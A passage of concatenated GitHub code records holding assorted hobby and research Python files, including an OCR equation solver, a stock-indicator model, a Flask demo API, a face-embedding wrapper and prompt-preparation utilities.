Recipe()\n\t\t\t\trecipe.print_recipe()","repo_name":"mcraipea/Bootcamp__python","sub_path":"Day_01/ex00/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4648767668","text":"import uuid\n\nimport numpy as np\nimport pytesseract\nfrom sympy import Symbol, Eq, solve, plotting, simplify\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nfrom matplotlib.figure import Figure\n\n\ncorrect_dict = {'—': '-', 'T': '7', 'a': 'x', '?': '^2', 'I': '2', 'r': 'x'}\ncorrect_op = ['*', '-', '+', '/', '=']\n\n\nclass MathRect:\n def __init__(self, init_coord, end_coord, image, is_simple):\n self.is_simple = is_simple\n self.init_coord = init_coord\n self.end_coord = end_coord\n self.image = image\n self.id = str(uuid.uuid4())\n self.text = pytesseract.image_to_string(image[:, :, ::-1]).rstrip()\n self.text = self._correct_text(self.text)\n if self.is_simple:\n self.unknown = self._get_unknown(self.text)\n\n self.equation = self._format_text(self.text)\n\n x = Symbol('x')\n if not is_simple:\n y = Symbol('y')\n f = Eq(eval(self.equation[0]), eval(self.equation[1]))\n self.sol = solve(f, y)\n self.sol_form = str(simplify(self.sol[0]))\n\n x = np.linspace(-100, 100, 1000)\n fig = Figure()\n canvas = FigureCanvas(fig)\n ax = fig.gca()\n ax.margins(x=0.1, y=0.1)\n ax.set_title(self.sol_form + ' = y')\n ax.plot(x, eval(self.sol_form))\n ax.grid()\n canvas.draw()\n self.plot_image = np.frombuffer(canvas.tostring_rgb(), dtype='uint8')\n size = fig.get_size_inches() * fig.dpi\n self.plot_image = self.plot_image.reshape((int(size[1]), int(size[0]), 3))\n self.sol_form = str(simplify(self.sol[0])) + ' = y'\n else:\n f = Eq(eval(self.equation[0]), eval(self.equation[1]))\n self.sol = solve(f, x)\n self.sol_form = 'x = ' + str(self.sol)\n\n def is_pt_in(self, pt):\n return self.init_coord[0] <= pt[0] <= self.end_coord[0] and self.init_coord[1] <= pt[1] <= self.end_coord[1]\n\n @staticmethod\n def _get_unknown(text):\n unknown = ''\n for c in text:\n if c in correct_op or c.isdigit():\n continue\n if unknown == '':\n unknown = c\n continue\n if c != unknown:\n print(\"Something is wrong...\", unknown, c)\n return unknown\n\n @staticmethod\n def _correct_text(text):\n new_text = \"\"\n for c in text:\n v = correct_dict.get(c)\n if v is None:\n new_text += c\n else:\n new_text += v\n return new_text.replace(' ', '')\n\n def _format_text(self, text):\n if self.is_simple:\n text = text.replace(self.unknown, 'x')\n text = text.replace('^', '**')\n unknown_idx = [i for i in range(len(text)) if text.startswith('x', i)]\n idx_offset = 0\n for idx in unknown_idx:\n idx += idx_offset\n if idx == 0 or text[idx-1] in correct_op:\n continue\n text = text[:idx] + '*' + text[idx:]\n idx_offset += 1\n if not self.is_simple:\n unknown_idx = [i for i in range(len(text)) if text.startswith('y', i)]\n idx_offset = 0\n for idx in unknown_idx:\n idx += idx_offset\n if idx == 0 or text[idx - 1] in correct_op:\n continue\n text = text[:idx] + '*' + text[idx:]\n idx_offset += 1\n return text.split('=')\n\n\nif __name__ == '__main__':\n m = MathRect(None, None, None, is_simple=False)\n","repo_name":"diegobonilla98/Algebra-AR-Online-Class-Helper","sub_path":"MathRect.py","file_name":"MathRect.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74973944773","text":"\"\"\"Webserver with module example.\"\"\"\nfrom aiohttp import web\nfrom aries_staticagent import Module, Connection, utils\nfrom aries_staticagent.module import ModuleRouter\nfrom common import config\n\n\nclass BasicMessageCounter(Module):\n \"\"\"A simple BasicMessage module.\n\n Responds with the number of messages received.\n \"\"\"\n\n protocol = \"https://didcomm.org/basicmessage/1.0\"\n route = ModuleRouter(protocol)\n\n def __init__(self):\n super().__init__()\n self.count = 0\n\n @route\n async def message(self, _msg, conn):\n \"\"\"Respond to basic messages with a count of messages received.\"\"\"\n self.count += 1\n await conn.send_async(\n {\n \"@type\": self.type(\"message\"),\n \"~l10n\": {\"locale\": \"en\"},\n \"sent_time\": utils.timestamp(),\n \"content\": \"{} message(s) received.\".format(self.count),\n }\n )\n\n\ndef main():\n \"\"\"Create connection and start web server.\"\"\"\n keys, target, args = config()\n conn = Connection(keys, target)\n\n bmc = BasicMessageCounter()\n conn.route_module(bmc)\n\n async def handle(request):\n \"\"\"aiohttp handle POST.\"\"\"\n await conn.handle(await request.read())\n return web.Response(status=202)\n\n app = web.Application()\n app.add_routes([web.post(\"/\", handle)])\n\n web.run_app(app, port=args.port)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hyperledger/aries-staticagent-python","sub_path":"examples/webserver_with_module.py","file_name":"webserver_with_module.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"44"} +{"seq_id":"12099179874","text":"import datetime\nfrom datetime import datetime as dt\nimport pandas\nimport psycopg2 as pg2\n\nimport math\nimport statistics\n\nimport matplotlib.pyplot as plt\nimport talib\nimport numpy as np\n\n\nfrom db import DB\n\ndb = DB()\ndb.connect()\n\nclass DataSource:\n\tdef __init__(self, params) -> None:\n\t\tself.params = params\n\t\tself.num_values = None\n\t\tself.T = []\n\t\tself.Y = []\n\n\tdef getValue(self, time):\n\t\treturn self.Y[ self.T.index(time) ]\n\t\n\tdef getValues(self, delta, start=None, end=None):\n\t\tassert( delta>0 )\n\t\tif start:\n\t\t\tst_idx = self.T.index(start)\n\t\t\treturn self.Y[ st_idx : st_idx+delta+1 ]\n\t\telif end:\n\t\t\ten_idx = self.T.index(end)\n\t\t\treturn self.Y[ en_idx-delta : en_idx+1 ]\n\n\tdef getTimes(self, delta, start=None, end=None):\n\t\tassert( delta>0 )\n\t\tif start:\n\t\t\tst_idx = self.T.index(start)\n\t\t\treturn self.T[ st_idx : st_idx+delta+1 ]\n\t\telif end:\n\t\t\ten_idx = self.T.index(end)\n\t\t\treturn self.T[ en_idx-delta : en_idx+1 ]\n\n\tdef getTrend(self, time):\n\t\traise NotImplementedError\n\nclass Vertex:\n\tdef __init__(self, source=None, child=None, title='') -> None:\n\t\tself.title = title\n\t\tself.source = source\n\t\tself.child = child\n\n\t\tself.description = \"\"\n\t\tself.mode2 = False\n\n\tdef getValue(self, time): # node value from -1 to 1, +1 means sangseung yo in\n\t\treturn 0\n\n\tdef getTimeValues(self, delta, start=None, end=None): # TODO need to optimize\n\t\tassert( delta>0 )\n\t\tanysource = None\n\t\tif self.child:\n\t\t\tanysource = self.child[0].source[0] # only works for level 1\n\t\telif self.source:\n\t\t\tanysource = self.source[0]\n\t\tif start:\n\t\t\tst_idx = anysource.T.index(start)\n\t\t\tperiod = anysource.T[ st_idx : st_idx+delta+1 ]\n\t\telif end:\n\t\t\ten_idx = anysource.T.index(end)\n\t\t\tperiod = anysource.T[ en_idx-delta : en_idx+1 ]\n\t\t\n\t\tif self.mode2:\t # TODO\n\t\t\treturn [ (p, self.getValue2(p)) for p in period]\n\t\telse:\n\t\t\treturn [ (p, self.getValue(p)) for p in period]\n\n\tdef getDescription(self):\n\t\treturn self.description\n\nclass Edge:\n\tdef __init__(self, src:Vertex, dst:Vertex, title='') -> None:\n\t\tself.src = src\n\t\tself.dst = dst\n\t\tself.title = title\n\n\tdef getAnalysis(self, time):\n\t\t# return priority, value, nl\n\t\traise NotImplementedError\n\n\"\"\"\nFROM HERE\n\"\"\"\ndef timeDelta(start, delta):\n\t# input : 2020-12-01\n\tst = dt.strptime(start, \"%Y-%m-%d\")\n\tdelta = datetime.timedelta(days=delta)\n\ten = st + delta\n\treturn en.strftime(\"%Y-%m-%d\")\n\nclass TickerDataSource(DataSource):\n\tdef __init__(self, params) -> None:\n\t\tsuper().__init__(params)\n\t\tself.q = \"\"\"\n\t\t\tselect\n\t\t\t\ttime,\n\t\t\t\tclose\n\t\t\tfrom prices\n\t\t\twhere\n\t\t\t\tticker = '{}'\n\t\t\t\tand time >= '{}' and time <= '{}'\n\t\t\torder by time asc\n\t\t\"\"\"\n\t\tq = self.q.format(self.params[0], '2019-01-01', '2021-12-31')\n\t\tdata = db.query(q)\n\t\tfor d in data:\n\t\t\tself.T.append( d[0].strftime('%Y-%m-%d') )\n\t\t\tself.Y.append( d[1] )\n\nclass SlowStochDataSource(DataSource):\n\tdef __init__(self, params) -> None:\n\t\tsuper().__init__(params)\n\t\tself.q = \"\"\"\n\t\t\tselect\n\t\t\t\ttime,\n\t\t\t\thigh, low, close\n\t\t\tfrom prices\n\t\t\twhere\n\t\t\t\tticker = '{}'\n\t\t\t\tand time >= '{}' and time <= '{}'\n\t\t\torder by time asc\n\t\t\"\"\"\n\t\tq = self.q.format(self.params[0], '2019-01-01', '2021-12-31')\n\t\tdata = db.query(q)\n\t\tt = [ d[0].strftime('%Y-%m-%d') for d in data ]\n\t\th = np.array([ float(d[1]) for d in data ])\n\t\tl = np.array([ float(d[2]) for d in data ])\t\n\t\tc = np.array([ float(d[3]) for d in data ])\n\t\tslowk = talib.STOCH(h,l,c, self.params[1],self.params[2],0,self.params[3],0)[0]\n\t\tslowk = slowk[~np.isnan(slowk)]\n\t\tloss = len(h) - len(slowk)\n\t\tself.T = t[loss:]\n\t\tself.Y = slowk.tolist()\n\t\tassert(len(self.T) == len(self.Y))\n\nclass IndexDataSource(DataSource):\n\tdef __init__(self, params) -> None:\n\t\tsuper().__init__(params)\n\t\tself.q = \"\"\"\n\t\t\tselect\n\t\t\t\ttime,\n\t\t\t\tclose\n\t\t\tfrom daily_index_prices\n\t\t\twhere\n\t\t\t\tticker = '{}'\n\t\t\t\tand time >= '{}' and time <= '{}'\n\t\t\torder by time asc\n\t\t\"\"\"\n\t\tq = self.q.format(self.params[0], '2019-01-01', '2021-12-31')\n\t\tdata = db.query(q)\n\t\tfor d in data:\n\t\t\tself.T.append( d[0].strftime('%Y-%m-%d') )\n\t\t\tself.Y.append( d[1] )\n\t\t\nclass TickerVertex(Vertex):\n\tdef __init__(self, source=None, child=None, title='') -> None:\n\t\tsuper().__init__(source, child, title)\n\t\tself.description = \"종목의 가격입니다.\"\n\t\tself.mode2 = True\n\n\tdef getValue(self, time):\n\t\t# diff between 1 week\n\t\tvals = self.source[0].getValues(5, end=time)\n\t\tbefore_5 = vals[0]\n\t\tnow = vals[-1]\n\t\tdiff_percent = ( (now-before_5) / before_5 ) * 100.0\n\n\t\t# to -1 1\n\t\tif diff_percent < 0:\n\t\t\treturn max(-1, diff_percent/10 )\n\t\telif diff_percent > 0:\n\t\t\treturn min(1, diff_percent/10 )\n\t\treturn 0\n\n\tdef getValue2(self, time):\n\t\treturn self.source[0].getValue(time)\n\nclass IndexVertex(Vertex):\n\tdef __init__(self, source=None, child=None, title='') -> None:\n\t\tsuper().__init__(source, child, title)\n\t\tself.description = \"종목과 관련된 지표의 가격입니다.\"\n\t\tself.mode2 = True\n\n\n\tdef getValue(self, time):\n\t\t# diff between 1 week\n\t\tvals = self.source[0].getValues(5, end=time)\n\t\tbefore_5 = vals[0]\n\t\tnow = vals[-1]\n\t\tdiff_percent = ( (now-before_5) / before_5 ) * 100.0\n\n\t\t# to -1 1\n\t\tif diff_percent < 0:\n\t\t\treturn max(-1, diff_percent/10 )\n\t\telif diff_percent > 0:\n\t\t\treturn min(1, diff_percent/10 )\n\t\treturn 0\n\t\n\tdef getValue2(self, time):\n\t\treturn self.source[0].getValue(time)\n\nclass SlowStochVertex(Vertex):\n\tdef __init__(self, source=None, child=None, title='') -> None:\n\t\tsuper().__init__(source, child, title)\n\t\tself.strMap = {\n\t\t\t'periodStr': ''\n\t\t}\n\t\tself.description = \"주가의 모멘텀을 판단하는 기술적 자표입니다. 수치가 높을 시 주가가 과열, 낮을 시 침체했음을 의미합니다.\"\n\t\tif source[0].params[1] >= 5:\n\t\t\tself.strMap['periodStr'] = '단기적'\n\t\tif source[0].params[1] >= 10:\n\t\t\tself.strMap['periodStr'] = '중기적'\n\t\tif source[0].params[1] >= 20:\n\t\t\tself.strMap['periodStr'] = '장기적'\n\n\tdef getValue(self, time):\n\t\tstochval = self.source[0].getValue(time)\n\t\t# map 100 - 0 to -1 - 1 \n\t\t# 100 is overbuy, 0 is oversell\n\t\treturn (stochval / 50.0 - 1)\n\t\t\nclass MultiStochVertex(Vertex):\n\tdef __init__(self, source=None, child=None, title='') -> None:\n\t\tsuper().__init__(source, child, title)\n\t\tself.description = \"여러 시간 간격의 모멘텀을 종합적으로 판단하는 합성 지표입니다.\"\n\t\n\tdef getValue(self, time):\n\t\tv1 = self.child[0].source[0].getValue(time) # 533\n\t\tv2 = self.child[1].source[0].getValue(time) # 1066\n\t\tv3 = self.child[2].source[0].getValue(time) # 201212\n\n\t\tif v1 < 20 and v2 < 20 and v3 < 20: # down\n\t\t\treturn -1\n\t\telif v1 > 80 and v2 > 80 and v3 > 80: # up\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\t\t\nclass SlowStochTickerEdge(Edge):\n\tdef __init__(self, src: Vertex, dst: Vertex, title='') -> None:\n\t\tsuper().__init__(src, dst, title)\n\n\tdef getAnalysis(self, time):\n\t\tvVal = self.src.source[0].getValue(time) # 0 to 100\n\t\tweight = abs(vVal-50) / 50.0\n\t\t\n\t\tnl = \"\"\n\t\tif vVal < 20:\n\t\t\tnl = \"{}으로 침체 상태입니다.\".format(self.src.strMap['periodStr'])\n\t\tif vVal >= 80:\n\t\t\tnl = \"{}으로 과열 상태입니다.\".format(self.src.strMap['periodStr'])\n\t\t# return priority, value, nl\n\t\treturn (weight, self.src.getValue(time), nl)\n\t\nclass MultiStochTickerEdge(Edge):\n\tdef __init__(self, src: Vertex, dst: Vertex, title='') -> None:\n\t\tsuper().__init__(src, dst, title)\n\tdef getAnalysis(self, time):\n\t\tval = self.src.getValue(time)\n\t\tnl = \"\"\n\t\tweight = 0\n\t\tif val == 1:\n\t\t\tweight = 1.0\n\t\t\tnl = \"전 구간에서 과열 상태이므로 매수에 유의하는 것이 좋습니다.\"\n\t\telif val == -1:\n\t\t\tweight = 1.0\n\t\t\tnl = \"전 구간에서 침체 상태이므로 반등의 기회가 있습니다.\"\n\t\treturn(weight, val, nl)\n\nclass IndexTickerEdge(Edge):\n\tdef __init__(self, src: Vertex, dst: Vertex, title='') -> None:\n\t\tsuper().__init__(src, dst, title)\n\nclass IndexIndexEdge(Edge):\n\tdef __init__(self, src: Vertex, dst: Vertex, title='') -> None:\n\t\tsuper().__init__(src, dst, title)\n\t\n\nif __name__ == \"__main___\":\n\tds = TickerDataSource( ('005930',) )\n\tssds = SlowStochDataSource( ('005930', 5,3,3) )\n","repo_name":"jinhoko-dg/citd4-2022s","sub_path":"server/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7620060878","text":"from Player import Player\nfrom Enemy import Enemy, Troll, Vampire, VampireKing\n\ntim = Player(\"Tim\")\n\nugly_troll = Troll(\"Pug\")\nprint(\"Ugly troll - {}\".format(ugly_troll))\n\nanother_troll = Troll(\"Ug\")\nprint(\"Another troll - {}\".format(another_troll, end=\"\"))\nanother_troll.take_damage(18)\nprint(another_troll)\n\nbrother_troll = Troll(\"Urg\")\nprint(\"Brother troll - {}\".format(brother_troll))\n\nugly_troll.grunt()\nanother_troll.grunt()\nbrother_troll.grunt()\n\nvamp = Vampire(\"Vlad\")\nprint(vamp)\nvamp.take_damage(5)\nprint(vamp)\n\nprint(\"-\" * 40)\nanother_troll.take_damage(30)\nprint(another_troll)\n\n# while vamp._alive:\n# vamp.take_damage(1)\n# print(vamp)\n\nvamp._lives = 0\nvamp._hit_points = 1\nprint(vamp)\n\ndracula = VampireKing(\"Dracula\")\nprint(dracula)\ndracula.take_damage(12)\nprint(dracula)\n","repo_name":"vmilkovic/python-programming-masterclass","sub_path":"Object Oriented Python/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"30037377540","text":"from flask import Flask, jsonify, request\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET'])\ndef hello():\n ''' Returns 'Hello, world' as a check of the API\n '''\n return 'Hello, world'\n\n\n@app.route('/name', methods=['GET'])\ndef my_name(name='Gabriel'):\n '''Returns creator name (Gabriel)\n '''\n return jsonify({'name': name})\n\n\n@app.route('/hello/<name>', methods=['GET'])\ndef say_hello(name='Gabriel'):\n '''Greets creator by name\n '''\n output = 'Hello there, {0}'.format(name)\n return jsonify({'message': output})\n\n\n@app.route('/distance', methods=['POST'])\ndef distance():\n '''Finds distance between two N-dimensional arrays\n '''\n try:\n from math import sqrt\n r = request.get_json()\n print(r)\n print(type(r))\n sum_dist = 0\n for n, value in enumerate(r['a']):\n sum_dist += (r['a'][n] - r['b'][n])**2\n dist = sqrt(sum_dist)\n\n return jsonify({'distance': dist, 'a': r['a'], 'b': r['b']})\n except TypeError:\n print('Numercial arrays only')\n except:\n print('Oops, something failed! :(')\n","repo_name":"JanIIISobieski/flask_getting_started","sub_path":"api_calls.py","file_name":"api_calls.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28027869613","text":"from sklearn.ensemble import IsolationForest\nfrom sklearn.covariance import EllipticEnvelope\nfrom sklearn.neighbors import LocalOutlierFactor\n\n\nclass OutlierDetector:\n def __init__(self, method='isolation_forest'):\n if method == 'iForest':\n self.method = IsolationForest()\n elif method == 'MCD':\n self.method = EllipticEnvelope()\n elif method == 'LOF':\n self.method = LocalOutlierFactor()\n else:\n raise ValueError(f\"Method: '{method}' is not supported.\")\n\n def detect_outliers(self, x):\n if x.shape[0] > 0:\n y_hat = self.method.fit_predict(X=x)\n outliers_idx = [i for i, y in enumerate(y_hat) if y == -1]\n else:\n outliers_idx = list()\n\n return outliers_idx\n","repo_name":"CamiloGuillen/Normalizing_Houston_Kinetic_Dataset","sub_path":"clean_dataset/outlier_detector.py","file_name":"outlier_detector.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27433608263","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\nfrom Adafruit_Thermal import *\nimport requests\nimport json\n\nprinter = Adafruit_Thermal(\"/dev/ttyS0\", 19200, timeout=5)\n\nurl = \"https://api.mlab.com/api/1/databases/krpyl/collections/queue\"\nkey = \"?apiKey=\"\n\n# insertData = json.loads('{\"data\":[\"sdcsd\",\"dsdfsdfsd\",\"fsdfsdf\"]}')\n# print(\"Data Inserted\")\n# insert = requests.post(url+key,json=insertData)\nresponse = requests.get(url+key)\n# print(response.content)\n\n\nif response.status_code == 200 :\n data = json.loads(response.content)\n result = data[0][\"data\"]\n id = data[0][\"_id\"][\"$oid\"]\n response = requests.delete(url+\"/\"+id+key)\n \n for line in result:\n if(line == '$'):\n printer.feed(1)\n else:\n printer.println(line)\n\n response = requests.delete(url+\"/\"+id+key)\n #print(\"Deleted\")\n","repo_name":"kanadenipun/pyl","sub_path":"pyl.py","file_name":"pyl.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30073891779","text":"import os\n\nassetsExtensions = [\".mp3\", \".png\"]\nexclude = {\n \"dirs\":[\"spritesheets\"],\n \"files\":[]\n}\n\nfirstFile = True\nwith open(os.path.dirname(os.path.dirname(__file__)) + '\\\\datafiles\\\\assetsdata', 'w') as configFile:\n for root, dirs, files in os.walk(os.path.dirname(__file__)):\n pathFolders = root.split(\"\\\\\")\n if pathFolders[-1] in exclude[\"dirs\"]:\n continue\n \n for i, fld in enumerate(pathFolders):\n if fld == \"assets\":\n for file in files:\n if file not in exclude[\"files\"] and os.path.splitext(file)[1] in assetsExtensions:\n if firstFile is False:\n configFile.write(\"\\n\")\n\n firstFile = False\n configFile.write(\"/\".join(pathFolders[i:]) + f\"/{file}\")\n if len(pathFolders[i+2:]) > 0:\n configFile.write(f\"~{'/'.join(pathFolders[i+2:]) + f'/{os.path.splitext(file)[0]}'}\")\n else:\n configFile.write(f\"~{os.path.splitext(file)[0]}\")\n break\n\n\"\"\"\npython config.py\n\"\"\"","repo_name":"YoAquinJs/pacman","sub_path":"assets/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"30051637314","text":"\"\"\"\nCreated by Alex Wang\nOn 2018-07-30\n\nModel: https://github.com/yule-li/CosFace\n\n[Configurations]:\n\tlfw_pairs: data/pairs.txt\n\tembedding_size: 1024\n\tmodel_def: models.inception_resnet_v1\n\tsave_model: False\n\tdo_flip: False\n\timage_width: 112\n\tlfw_dir: dataset/lfw-112x96\n\tprewhiten: False\n\tlfw_nrof_folds: 10\n\timage_height: 112\n\tlfw_batch_size: 200\n\timage_size: 224\n\tfc_bn: True\n\tmodel: models/model-20180626-205832.ckpt-60000\n\tnetwork_type: sphere_network\n\tlfw_file_ext: jpg\n[End of configuration]\n\"\"\"\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport cv2\nimport numpy as np\n\nimport sphere_network\nimport utils\n\nimage_width = 112\nimage_height = 112\nembedding_size = 1024\n# face_threshold = 1.49\n# face_threshold = 1.54\nface_threshold = 0.95\nface_combine_threshold = 0.7\nsave_threshold_min = 0.5\nsave_threshold_max = 0.7\n\n\nclass CosFace(object):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, weight_file):\n config = tf.ConfigProto(log_device_placement=False)\n config.gpu_options.allow_growth = True\n\n self.__graph = tf.Graph()\n\n with self.__graph.as_default():\n self.__session = tf.Session(config=config, graph=self.__graph)\n\n self.images_placeholder = tf.placeholder(tf.float32, shape=(\n None, image_height, image_width, 3), name='image')\n self.phase_train_placeholder = tf.placeholder(tf.bool, name='phase_train')\n\n prelogits = sphere_network.infer(self.images_placeholder, embedding_size)\n\n prelogits = slim.batch_norm(prelogits,\n is_training=self.phase_train_placeholder,\n epsilon=1e-5,\n scale=True,\n scope='softmax_bn')\n\n self.embeddings = tf.identity(prelogits)\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=3)\n saver.restore(self.__session, weight_file)\n\n def infer(self, images, do_flip=False):\n \"\"\"\n\n :param images: utils.py-->load_data\n rgb format\n resize to (image_height, image_width, 3)\n img = img - 127.5\n img = img / 128.\n :return:\n \"\"\"\n feed_dict = {self.images_placeholder: images, self.phase_train_placeholder: False}\n feats = self.__session.run(self.embeddings, feed_dict=feed_dict)\n if do_flip:\n images_flip = [np.fliplr(image) for image in images]\n feed_dict_flip = {self.images_placeholder: images_flip, self.phase_train_placeholder: False}\n feats_flip = self.__session.run(self.embeddings, feed_dict=feed_dict_flip)\n feats = np.concatenate((feats, feats_flip), axis=1)\n feats = utils.l2_normalize(feats)\n return feats\n\n def data_preprocess(self, image):\n \"\"\"\n :param image: opencv bgr image\n :return:\n \"\"\"\n img_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n height, width = img_rgb.shape[0:2]\n img_new = np.zeros((image_height, image_width, 3), dtype=np.float64)\n ratio = min(image_height * 1.0 / height, image_width * 1.0 / width)\n new_height, new_width = int(height * ratio), int(width * ratio)\n height_offset, width_offset = (image_height - new_height) //2, (image_width - new_width) // 2\n img_rgb = cv2.resize(img_rgb, (new_width, new_height), interpolation=cv2.INTER_CUBIC)\n img_rgb = img_rgb.astype(np.float64)\n img_new[height_offset: height_offset + new_height, width_offset: width_offset + new_width, :] = img_rgb\n\n # img_new = cv2.resize(img_rgb, (image_height, image_width), interpolation=cv2.INTER_CUBIC)\n # img_new = img_new.astype(np.float64)\n img_new -= 127.5\n img_new /= 128.\n return img_new\n\n def face_dist(self, embedding_one, embedding_two):\n diff = np.subtract(embedding_one, embedding_two)\n dist = np.sum(np.square(diff))\n return dist\n\n def face_dist_multiple(self, embeddings_one, embeddings_two):\n diff = np.subtract(embeddings_one, embeddings_two)\n dist = np.sum(np.square(diff), 1)\n return dist\n\n def __del__(self):\n self.__session.close()\n","repo_name":"alexwongdl/PythonTemplate","sub_path":"experience/face/cosface_recognition/cosface_wrapper.py","file_name":"cosface_wrapper.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24394793273","text":"import sys\nimport os\n\n\nif __name__ == '__main__':\n # Remove the current working directory from sys.path for Python 3.7+\n # because since that version it's added by default to sys.path when\n # using 'python -m'.\n if sys.version_info[0] == 3 and sys.version_info[1] >= 7:\n cwd = os.getcwd()\n if cwd in sys.path:\n sys.path.remove(cwd)\n\n from spyder_kernels.console import start\n try:\n start.main()\n except Exception:\n # We have to explicitely write to __stderr__ as stderr might already\n # have been replaced.\n import traceback\n traceback.print_exc(file=sys.__stderr__)\n sys.__stderr__.flush()\n raise\n","repo_name":"spyder-ide/spyder","sub_path":"external-deps/spyder-kernels/spyder_kernels/console/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":7851,"dataset":"github-code","pt":"44"} +{"seq_id":"40096342109","text":"import os\nfrom glob import glob\n\n\ndef prepare_cps(prompt_dir, categories, use_txt_prompts: bool):\n if categories is None and use_txt_prompts:\n categories = [\n prompt_pth.split(\"/\")[-1].replace(\".txt\", \"\")\n for prompt_pth in sorted(list(glob(f\"{prompt_dir}/*.txt\")))\n ]\n elif categories is None and not use_txt_prompts:\n categories = [\n prompt_dir.split(\"/\")[-1]\n for prompt_dir in sorted(list(glob(f\"{prompt_dir}/*\")))\n ]\n else:\n pass\n\n # final cps to return\n final_cps = []\n\n # load category-prompt pairs\n for category in categories:\n if not use_txt_prompts:\n cps = [tuple(prompt_pth.split(\"/\")[-2:]) \n for prompt_pth \n in list(glob(f\"{prompt_dir}/{category}/*\"))]\n else:\n txt_pth = f\"{prompt_dir}/{category}.txt\"\n with open(txt_pth, \"r\") as f:\n cps = [\n tuple(\n [os.path.splitext(os.path.basename(txt_pth))[0], \n line.strip()]\n ) for line in f.read().split(\"\\n\")\n ]\n\n # remove empty string\n cps = [tuple([category, prompt]) \n for category, prompt in cps\n if len(prompt) > 0\n ]\n # remove prompt starting with #\n cps = [tuple([category, prompt]) \n for category, prompt in cps\n if prompt[0] != \"#\"\n ]\n # remove . in end\n cps = [tuple([category, prompt[:-1]]) if prompt[-1] == \".\" \n else tuple([category, prompt]) \n for category, prompt in cps]\n # remove duplicates\n cps = sorted(list(set(cps)))\n # append to final_cps\n final_cps += cps\n \n return final_cps\n\n\ndef prepare_augdict(cps, augmentation_path, verbose):\n with open(augmentation_path, \"r\") as f:\n # read augmentations\n augprompts = [line.strip() for line in f.read().split(\"\\n\") if line.strip() != \"\"]\n augprompts = [line.strip() for line in augprompts if line.strip()[0] != \"#\"]\n # header starts with \"AUGPROMPT_COMMON\": use augmentations for all prompts\n if augprompts[0] == \"AUGPROMPT_COMMON\":\n if verbose:\n print(\"Using Common Augprompts over All Prompts...\")\n augprompts = augprompts[1:]\n tmp = dict()\n for cp in cps:\n tmp[cp] = augprompts\n augdict = tmp\n # header starts with \"AUGPROMPT_PER_PROMPT\": augmentations specified for each prompt \n elif augprompts[0] == \"AUGPROMPT_PER_PROMPT\":\n if verbose:\n print(\"Using Prompt-specific Augprompts...\")\n augprompts = augprompts[1:]\n tmp = dict()\n current_category = \"\"\n current_prompt = \"\"\n for line in augprompts:\n if line[:12] == \"category:\":\n current_category = line.replace(\"category:\", \"\").strip()\n elif line[:7] == \"PROMPT:\":\n current_prompt = line.replace(\"PROMPT:\", \"\").strip()\n assert (current_category, current_prompt) not in tmp.keys(), f\"Duplicate prompt in {augmentation_path} file\"\n assert (current_category, current_prompt) in cps, f\"In {augmentation_path}, there are invalid prompts.\"\n tmp[(current_category, current_prompt)] = []\n elif current_category == \"\" or current_prompt == \"\":\n continue\n else:\n tmp[(current_category, current_prompt)].append(line.strip())\n augdict = tmp\n\n # invalid header => raise error \n else:\n assert False, \"Augprompt-header must be specified.\"\n \n # sort augdict\n augdict = dict(sorted(augdict.items()))\n assert tuple(sorted(list(augdict.keys()))) == tuple(sorted(cps)), f\"Mismatch in augprompt file: '{augmentation_path}' & cps we are to use: {cps}\"\n\n return augdict\n\n\ndef prepare_cps_from_dirs(args, image_dir, use_filter_setting=False):\n # Categories. If None, type them in.\n if args.categories is None:\n categories = [\"*\"] # all\n else:\n assert type(args.categories) == list\n categories = args.categories\n\n # Parse Categories.\n if type(categories) == str:\n categories = [category.strip() for category in categories.split(\",\")]\n else:\n assert type(categories) == list\n\n # To Save cps.\n cps = []\n\n # If using setting (usually After Filtering)\n if use_filter_setting:\n for category in categories:\n cps += [\n # modified for \"settings\" input\n tuple([prompt_pth.split(\"/\")[-3],prompt_pth.split(\"/\")[-1]]) \n for prompt_pth in list(glob(f\"{image_dir}/*/{category}/settings:*/*\"))\n ]\n # If not using setting (usually Before Filtering)\n else:\n for category in categories:\n cps += [\n tuple(prompt_pth.split(\"/\")[-2:]) \n for prompt_pth in list(glob(f\"{image_dir}/*/{category}/*\"))\n ]\n\n # Remove duplicate, and sort\n cps = sorted(list(set(cps)))\n \n # Filter the prompts.\n if 'prompts' not in vars(args).keys():\n pass\n elif args.prompts is not None:\n _cps = []\n for prompt_type, prompt in cps:\n if prompt in args.prompts:\n _cps += [(prompt_type, prompt)]\n cps = _cps\n # print 